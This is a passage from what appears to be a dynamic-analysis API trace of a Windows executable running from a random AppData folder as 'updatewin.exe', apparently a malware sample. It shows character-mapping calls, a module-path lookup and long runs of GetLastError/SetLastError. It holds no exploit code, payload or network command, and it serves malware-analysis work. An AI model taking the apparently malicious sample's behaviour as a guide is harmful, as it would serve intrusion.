CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.516] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ엨쨀㞥AĀ") returned 256 [0044.516] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ엨쨀㞥AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0044.516] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ엨쨀㞥AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0044.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+f¼Í\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0044.516] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.516] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.516] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ엨쨀㞥AĀ") returned 256 [0044.516] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ엨쨀㞥AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0044.516] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ엨쨀㞥AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0044.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+f¼Í\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0044.516] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43b480, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe")) returned 0x5e [0044.516] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.516] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.516] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.516] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.516] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.517] GetLastError () returned 0x0 [0044.517] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.518] SetLastError (dwErrCode=0x0) [0044.518] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.519] SetLastError (dwErrCode=0x0) [0044.519] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.520] GetLastError () returned 0x0 [0044.520] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.521] SetLastError (dwErrCode=0x0) [0044.521] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.522] GetLastError () returned 0x0 [0044.522] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x67) returned 0x231990 [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.523] GetLastError () returned 0x0 [0044.523] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.524] GetLastError () returned 0x0 [0044.524] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.525] SetLastError (dwErrCode=0x0) [0044.525] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.526] GetLastError () returned 0x0 [0044.526] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.527] SetLastError (dwErrCode=0x0) [0044.527] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.528] SetLastError (dwErrCode=0x0) [0044.528] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.529] SetLastError (dwErrCode=0x0) [0044.529] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] GetLastError () returned 0x0 [0044.530] SetLastError (dwErrCode=0x0) [0044.530] 